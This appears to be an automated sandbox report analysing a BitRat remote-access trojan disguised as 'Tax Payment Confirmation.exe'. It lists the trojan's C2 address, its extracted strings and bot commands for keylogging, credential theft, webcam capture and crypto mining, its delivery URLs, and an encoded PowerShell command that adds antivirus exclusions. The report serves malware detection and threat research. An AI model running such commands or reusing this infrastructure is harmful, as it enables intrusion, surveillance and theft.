  - Tax Payment Confirmation.exe (PID: 2888)
  - Tax Payment Confirmation.exe (PID: 3196)
  - Tax Payment Confirmation.exe (PID: 2868)
- Application launched itself
  - iexplore.exe (PID: 2036)
- Drops the executable file immediately after the start
  - WinRAR.exe (PID: 1796)
- Checks supported languages
  - Tax Payment Confirmation.exe (PID: 1740)
  - Tax Payment Confirmation.exe (PID: 2888)
  - Tax Payment Confirmation.exe (PID: 2760)
  - Tax Payment Confirmation.exe (PID: 2968)
  - Tax Payment Confirmation.exe (PID: 3196)
  - Tax Payment Confirmation.exe (PID: 2868)
  - Tax Payment Confirmation.exe (PID: 2736)
- Reads the computer name
  - Tax Payment Confirmation.exe (PID: 2760)
  - Tax Payment Confirmation.exe (PID: 2888)
  - Tax Payment Confirmation.exe (PID: 2968)
  - Tax Payment Confirmation.exe (PID: 3196)
  - Tax Payment Confirmation.exe (PID: 2868)
  - Tax Payment Confirmation.exe (PID: 1740)
  - Tax Payment Confirmation.exe (PID: 2736)
- Creates files or folders in the user directory
  - Tax Payment Confirmation.exe (PID: 2888)
- Executable content was dropped or overwritten
  - WinRAR.exe (PID: 1796)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

BitRat

(PID) Process(2968) Tax Payment Confirmation.exe

C2103.153.182.89

Ports6161

Options

TorProcesstor

CommunicationPassword81dc9bdb52d04dc20036dbd8313ed055

InstallNameInstall name

InstallFolderInstall path

Version1.38

Keys

MD53cd2dc8f969c0053

Strings (690)

(1)

(Build:

(Last bootup:

(max:

(x64)

(x86)

* CPU

* DONATE

* POOL #1

-a "

-incognito

-l "

GiB

Hz)</val2>

KiB

MHz)</val2>

MHz</val2>

Mbit/s

TiB

[Download]

algo

"message_id":

"text":"

"update_id":

$3^(

% Available (charging)

%)</size>

%|-1

&text=

)</val1>

)</val2>

+unning

--profile-directory=Default

-2147483643/

-2147483645/

-2147483646/

-2147483647/

-2147483648/

-2147483650

.dat

.enc

.json

.xml

.zip

.ziptebrv

/cam.

/clbtart.

/dlex

/free

/pwsY

/resync /nowait

/scr.

/sendMes

/sendMessage?chat_id=

/usb

/vol8

1|-1

78hf326f87

9HSA

9onnecting...

;CK_CMD|

;HIFT

;toppe{

</block>

</cpuusage>

</date>

</dep>

</desc>

</err>

</est>

</files>

</filesystem>

</icon>

</isprc>

</issys>

</label>

</lis>

</mod>

</name>

</path>

</pb>

</pid>

</pri>

</ramload>

</ramsize>

</server>

</silent>

</sizefree>

</sizetotal>

</sizeused>

</startup>

</state>

</sz>

</sz>s>

</tcp>

</threads>

</title>

</type>

</udp>

</v>zefro

</v>|

</val2>

</xml>

<F11]

<F12]

<F1]

<F3]

<F4]

<F9]

<attr>

<block>

<data>

<date>

<dep>

<desc>

<dirs>

<disp>

<err>patS

<hwnd>

<icon>

<isprc>

<lis>

<name>

<path>

<pid>

<size>

<state>

<sz>D

<tcp>

<type>

<val1>Antivirus</val1>

<val1>Graphic card (

<val1>Input locale</val1>

<val1>Installed RAM</val1>

<val1>Monitor (

<val1>OS architecture</val1>

<val1>OS install date</val1>

<val1>OS version</val1>

<val1>Operating system</val1>

<val1>PC domain</val1>

<val1>PC manufacturer</val1>

<val1>PC model</val1>

<val1>Platform type</val1>

<val1>Processor</val1>

<val1>RAM slot (

<val1>System locale</val1>

<val1>System uptime</val1>

<val1>Username</val1>

<val2>

<xml>

=li_un

=on_close

?ocks5_srv_start

?rv_start

ADD

APPACTIVATE

AVE_MARIA

Action: /cam

Action: /clsbrw

Action: /klg

Action: /msg

Action: /usb

Action: /vol

Action: /web

Adapter

Alerts disabled

Alerts enabled

All in One

Armenian

Attempting to launch browser...

Automatic

Basque

Boot Start

Bot ID:

BuildNumber

Bulgarian

Bus Expansion Chassis

Business

CLOSED

Capacity

Caption

ChassisTypes

Closing virtual desktop...

Connecting...

CreateDesktop API failed!

CreateProcess API failed!

Critical error control

Croatian

Czech

DEL

DELETE_TCB

Danish

Datacenter

DelegateExecute

Desktop

Disabled

Disconnected

DisplayIcon

DisplayName

DisplayVersion

Docking Station

DriverVersion

END

ESC

Enterprise

EstimatedChargeRemaining

EstimatedRunTime

EstimatedSize

Estonian

Expansion Chassis

F10

F12

F13

F14

F15

F16

FAIL (invalid arguments)

FAIL (invalid log size)

FIN_WAIT1

FIN_WAIT2

Faeroese

Failed to launch browser

File system driver

Finnish

FriendlyName

Fully charged (

Georgian

Gonnecting...

Gontinuing

Greek

Gujarati

H/dep>

H/disp>

H/mod>

H/path>

H/pb>

H/status>

H/title>

Hand Held

Hblock>

Hclass>

Hdep>

Hebrew

Hidden

Hindi

Hpath>

Hpid>

Htitle>

Hudp>

Hungarian

Hxml>

IELAY

INS

Icelandic

IelegateExecute

InstallDate

InstallLocation

Interactive process

Itarting

Itopping

JF10]

JF13]

JF14]

JF2]

JF5]

JF6]

JF7]

JF8]

Kazakh

Keep-alive

Kernel driver

Keylog:

Kli_dc

Kli_off

Kli_rc

Kli_sleep

Kyrgyz

LAST_ACK

LISTENING

Laptop

Lithuanian

Low Profile Desktop

Lplg\

Lunch Box

Macedonian

Main System Chassis

Malay - Brunei Darussalam

Manual

Manufacturer

Mate

MaxClockSpeed

Maximized

Mini Tower

Mocks5_srv_start

Mrv_list

No active

No clipboard

Normal

Norwegian - Bokmal

Norwegian - Nynorsk

Notebook

OSLanguage

Oitle

P |

Peripheral Chassis

Pizza Box

Polish

Portable

Portuguese - Brazilian

Portuguese - Standard

Powrprof.dll

Publisher

QuietUninstallString

RB_ST

Rack Mount Chassis

Recognizer driver

Remote browser started!

Remote browser stopped!

Romanian

RtlGetVersion

SC_PR_ST

SC_ST

SC_ST2

SELECT * FROM Win32_Processor

SELECT * From AntiVirusProduct

SYN_RCVD

SYN_SENT

ScreenHeight

ScreenWidth

Sealed-Case PC

Select * from Win32_BIOS

Select * from Win32_Battery

Select * from Win32_TimeZone

Serbian - Latin

Service ignores error

SetThreadDesktop API failed!

Severe error control

Slovak

Slovenian

Socket was unexpectedly closed!

Sorry, Chrome was not detected!

Spanish - Argentina

Spanish - Bolivia

Spanish - Chile

Spanish - Colombia

Spanish - Costa_Rica

Spanish - Dominican Republic

Spanish - Ecuador

Spanish - El Salvador

Spanish - Guatemala

Spanish - Honduras

Spanish - Mexican

Spanish - Modern Sort

Spanish - Nicaragua

Spanish - Panama

Spanish - Paraguay

Spanish - Peru

Spanish - Puerto Rico

Spanish - Traditional Sort

Spanish - Uruguay

Spanish - Venezuela

Speed

Starter

Status:

Status: FAIL (no available cam)

Status: OK

Storage Chassis

Sub Notebook

SubChassis

Swedish - Finland

Switching to virtual desktop...

Syriac

TIME_WAIT

TLS Handshake

Tamil

Tatar

Telugu

Thai[

UCBrowser.exe

Ukrainian

Unknown

Urdu</stv

User:

Uzbek - Cyrillic

V/data>

V/dirs>

V/hwnd>

V/name>

V/path>

V/pid>

V/size>

Vblock>

Vdir>

Verr>

Version

Vietnamese

Virtual Machine

Vissys>

Vmod>

Vpath>

Vpb>

Vsize>-1</size>

Vxml>

WC_PR_ST

Web Server

Win 10

Win 11

Win 2000

Win 8.1

Win XP

Win32

Win32 process

Win32 share process

Window:

Wisconnected

WmiQueryAllDataW

Zplg\

[BACKSPACE]

[CAPSLOCK]

[CLEAR]

[CLIPBOARD_END]

[CLIPBOARD_START]

[CTRL+@]

[CTRL+A]

[CTRL+B]

[CTRL+C]

[CTRL+D]

[CTRL+E]

[CTRL+F]

[CTRL+G]

[CTRL+H]

[CTRL+I]

[CTRL+J]

[CTRL+K]

[CTRL+L]

[CTRL+M]

[CTRL+N]

[CTRL+O]

[CTRL+P]

[CTRL+Q]

[CTRL+R]

[CTRL+S]

[CTRL+T]

[CTRL+U]

[CTRL+V]

[CTRL+W]

[CTRL+X]

[CTRL+Y]

[CTRL+Z]

[CTRL+[]

[CTRL+\]

[CTRL+]]

[CTRL+^]

[CTRL+_]

[DEL]

[DOWN]

[END]

[ENTER]

[ESC]

[EXECUTE]

[F15]

[F16]>

[HELP]

[HOME]

[INS]

[LEFT]

[MENU]

[NUMLOCK]

[NUMPAD_0]

[NUMPAD_1]

[NUMPAD_2]

[NUMPAD_3]

[NUMPAD_4]

[NUMPAD_5]

[NUMPAD_6]

[NUMPAD_7]

[NUMPAD_8]

[NUMPAD_9]

[NUMPAD_ADD]

[NUMPAD_DECIMAL]

[NUMPAD_DIVIDE]

[NUMPAD_MULTIPLY]

[NUMPAD_SEPARATOR]

[NUMPAD_SUBTRACT]

[PAGEDOWN]

[PAGEUP]

[PAUSE]

[PRTSCR]

[RIGHT]

[SCROLL]

[SELECT]

[SHIFT]

[TAB]

[UP]:

[nknown

\Google\C

\Google\Chrome\User Data

\Mozilla\Firefox

\Opera\Opera

\Torch\User Data

\b\d{2}[-]\d{2}[-]\d{4}\b

\plg

\plg\

\plg\inj64.exe

\plg\pid

\setup.exe

about:blank

alert

alert|

aud_rec_list

autoruns

autoruns_del

autoruns_req

browsers_clear

chrome.exe

cli_bsod

cli_hib

cli_log

cli_off

cli_rs

cli_sleep

cli_up

clipboard_get

con_list

crd_logins

crd_logins_report

crd_logins_report_req

crd_logins_req

crd_logins_start_tg

crd_logins_tg

data

date

ddos_stop

displayName

dl_dir_obj_count

dlexec

drives_get

files_delete

files_delete_dir_normal

files_delete_dir_secure

files_delete_end

files_delete_secure

files_delete_start

files_download_resume

files_get

files_search_path

files_upload

files_zip

files_zip_end

files_zip_start

firefox.exe

g0 Hz,

h<u~~h

hsz

http://api.ipify.org

http://ip

http://ipecho.net/plain

http://ipinfo.io/ip

http://ipv4.icanhazip.com

http://wtfismyip.com/text

h}p~~h

iexplore.exe

image/jpeg

image/png

injdll

kersion:

klgoff_del

klgoff_dl_all

klgoff_dl_recent

klgoff_get

klgoff_list

klgonlinestart

klgonlinestop

max

miles_delete_start

miles_new_dir

miles_upload_dir

miles_zip_dir

miles_zip_end

mnk32

monitors_refresh

msedge.exe

msgbox

notes_get

notes_set

ntdll.dll

opera.exe

prc_kill

prc_list

prc_priority

prc_restart

prc_resume

prc_suspend

productState

reg_hkeys_get

reg_keys_get

rejected

remotebrowser_error

remotebrowser_info

remotebrowser_stop

root

scr_off

scr_on

screenlive_stop

settings

shell_stop

socks4r_stats

socks4r_stop

socks5_srv_stats

soft_list

soft_uninstall

speed

speedtest

srv_control

srv_list

srv_start

srv_uninstall

task_del

tasks_list

thtml

thumb_data

torch.exe

unk32

unknown

upnp_data

usb_spread

vivaldi.exe

vol_edit

w32tm.exe

wL_DL

wL_DL_RESUME

wd_kill

webcam_devices

webcam_start

webcam_stop

website_open

wnd_list

wnd_title

xmr64_mine_ready

xmr64_mine_req

xmr_mine_log

xmr_mine_ready

xmr_mine_req

xmr_mine_stats

xmrmine

{iles_delete_end

{iles_download

{iles_exec

{iles_rename

{iles_search

{iles_search_stop

{iles_zip

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRgNNmf9XjPAEaZ6CQ6NJlHzgU1ck3qhq0LC7ULPi97...

2a3fa8859aa60a61

34e3d245d93587451a6ceb1d6a76c852

4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200000000000000000000007E3100004B0000000000...

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

ecdc31f2dea81e61ab5c62d06630d6abdf6a05ade21ad1b9941ef48682ffc8d784a7cff9b6482306505fdc3b5f5fc6d80fb237a1fb0f14765d144deb577f32d91fd40e6a23f51896ca01d4b793daebfbcd561180014a59ece1195aea545d20910f74942ccba391bcf89f97b934852d3c

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

1740

"C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.1645\Tax Payment Confirmation.exe"

C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.1645\Tax Payment Confirmation.exe

WinRAR.exe

User:

admin

Company:

Google Inc.

Integrity Level:

MEDIUM

Description:

Google Update Setup

Exit code:

Version:

1.3.33.23

Modules

Images
c:\users\admin\appdata\local\temp\rar$exa1796.1645\tax payment confirmation.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll

1796

"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Tax Payment Confirmation.zip"

C:\Program Files\WinRAR\WinRAR.exe

iexplore.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Exit code:

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll

2036

"C:\Program Files\Internet Explorer\iexplore.exe" "http://gemmeco.com//wp-include/kkf.htm"

C:\Program Files\Internet Explorer\iexplore.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Internet Explorer

Exit code:

Version:

11.00.9600.16428 (winblue_gdr.131013-1700)

Modules

Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll

2068

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2036 CREDAT:267521 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

iexplore.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Internet Explorer

Exit code:

Version:

11.00.9600.16428 (winblue_gdr.131013-1700)

Modules

Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll

2536

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAUgBhAHIAJABFAFgAYQAxADcAOQA2AC4ANAA4ADQAMgBcAFQAYQB4ACAAUABhAHkAbQBlAG4AdAAgAEMAbwBuAGYAaQByAG0AYQB0AGkAbwBuAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAGEAeAAgAFAAYQB5AG0AZQBuAHQAIABDAG8AbgBmAGkAcgBtAGEAdABpAG8AbgAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBwAGMAeABsAHMAcwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAATQBwAGMAeABsAHMAcwAuAGUAeABlAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

Tax Payment Confirmation.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

2628

"C:\Windows\System32\cmd.exe" /k START "" "C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.1645\Tax Payment Confirmation.exe" & EXIT

C:\Windows\System32\cmd.exe

Tax Payment Confirmation.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

2736

"C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.1645\Tax Payment Confirmation.exe"

C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.1645\Tax Payment Confirmation.exe

cmd.exe

User:

admin

Company:

Google Inc.

Integrity Level:

HIGH

Description:

Google Update Setup

Exit code:

3762504530

Version:

1.3.33.23

Modules

Images
c:\users\admin\appdata\local\temp\rar$exa1796.1645\tax payment confirmation.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll

2748

"C:\Windows\System32\cmd.exe" /k START "" "C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.4842\Tax Payment Confirmation.exe" & EXIT

C:\Windows\System32\cmd.exe

Tax Payment Confirmation.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

2760

"C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.4842\Tax Payment Confirmation.exe"

C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.4842\Tax Payment Confirmation.exe

WinRAR.exe

User:

admin

Company:

Google Inc.

Integrity Level:

MEDIUM

Description:

Google Update Setup

Exit code:

Version:

1.3.33.23

Modules

Images
c:\users\admin\appdata\local\temp\rar$exa1796.4842\tax payment confirmation.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll

2868

"C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.13792\Tax Payment Confirmation.exe"

C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.13792\Tax Payment Confirmation.exe

WinRAR.exe

User:

admin

Company:

Google Inc.

Integrity Level:

MEDIUM

Description:

Google Update Setup

Exit code:

Version:

1.3.33.23

Modules

Images
c:\users\admin\appdata\local\temp\rar$exa1796.13792\tax payment confirmation.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll

Add for printing

Total events

31 141

Read events

30 909

Write events

230

Delete events

Modification events


(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:	write	Name:	NTPDaysSinceLastAutoMigration
Value: 0
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:	write	Name:	NTPLastLaunchHighDateTime
Value: 30847387
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:	write	Name:	NextCheckForUpdateHighDateTime
Value: 30847437
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:	write	Name:	CompatibilityFlags
Value: 0
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(2036) iexplore.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2036	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157		compressed
		MD5:1BFE591A4FE3D91B03CDF26EAACD8F89	SHA256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
2036	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico		image
		MD5:DA597791BE3B6E732F0BC8B20E38EE62	SHA256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
2036	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\favicon[2].ico		image
		MD5:DA597791BE3B6E732F0BC8B20E38EE62	SHA256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
2068	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\kkf[1].htm		html
		MD5:90B310DDA1EFB923A3DE99460D286AFF	SHA256:7A89819210E26A3A45514236595C821612A0D55394D761B325320BB1FCB63F17
2036	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\favicon[1].ico		image
		MD5:DA597791BE3B6E732F0BC8B20E38EE62	SHA256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
2068	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Tax Payment Confirmation.zip.qfjn5sh.partial		compressed
		MD5:4C183A2A0BED8908C86903BE9FA77337	SHA256:4ADEC55ABF8DCC183F00634C90E1378B7BA82A6A71DC8F9DA8E1BA04599FA531
2036	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157		binary
		MD5:F0C0B658A67F6B26CE628B25D1941B3F	SHA256:5936160496CE26243D1F4E8B96D19822A14643F23D56BA7979AD69188FDD7182
1796	WinRAR.exe	C:\Users\admin\AppData\Local\Temp\Rar$EXa1796.1645\Tax Payment Confirmation.exe		executable
		MD5:FD45D08F2AC28BBE3F6521DCA9442514	SHA256:0A581833A147914957FECA75A4A270AB06703ACBAD12DC25C4EC513701BD722F
2036	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verB2E0.tmp		xml
		MD5:CBD0581678FA40F0EDCBC7C59E0CAD10	SHA256:159BD4343F344A08F6AF3B716B6FA679859C1BD1D7030D26FF5EF0255B86E1D9
2036	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Tax Payment Confirmation.zip.qfjn5sh.partial:Zone.Identifier		text
		MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B	SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2068	iexplore.exe	GET	200	82.98.171.63:80	http://bodaitziarymiguel.com/wp-content/Tax%20Payment%20Confirmation.zip	unknown	compressed	49.3 Kb	unknown
2068	iexplore.exe	GET	200	68.178.145.254:80	http://gemmeco.com//wp-include/kkf.htm	unknown	html	178 b	unknown
2036	iexplore.exe	GET	200	68.178.145.254:80	http://gemmeco.com/favicon.ico	unknown	—	—	unknown
—	—	GET	200	93.184.221.240:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?0cd9c6b93b31954c	unknown	compressed	4.66 Kb	unknown
—	—	GET	200	93.184.221.240:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a85e8d0c2f0a71a5	unknown	compressed	4.66 Kb	unknown
—	—	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D	unknown	binary	314 b	unknown
1080	svchost.exe	GET	304	93.184.221.240:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?0754c686571bd23f	unknown	—	—	unknown
2036	iexplore.exe	GET	200	192.229.221.95:80	http://crl3.digicert.com/DigiCertGlobalRootCA.crl	unknown	binary	779 b	unknown
2036	iexplore.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAqvpsXKY8RRQeo74ffHUxc%3D	unknown	binary	471 b	unknown
2036	iexplore.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	binary	471 b	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2068	iexplore.exe	68.178.145.254:80	gemmeco.com	GO-DADDY-COM-LLC	IN	unknown
4	System	192.168.100.255:138	—	—	—	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
2036	iexplore.exe	68.178.145.254:80	gemmeco.com	GO-DADDY-COM-LLC	IN	unknown
1080	svchost.exe	224.0.0.252:5355	—	—	—	unknown
2068	iexplore.exe	82.98.171.63:80	bodaitziarymiguel.com	DinaHosting S.L.	ES	unknown
2036	iexplore.exe	23.53.43.121:443	www.bing.com	Akamai International B.V.	DE	unknown
2036	iexplore.exe	93.184.221.240:80	ctldl.windowsupdate.com	EDGECAST	GB	whitelisted
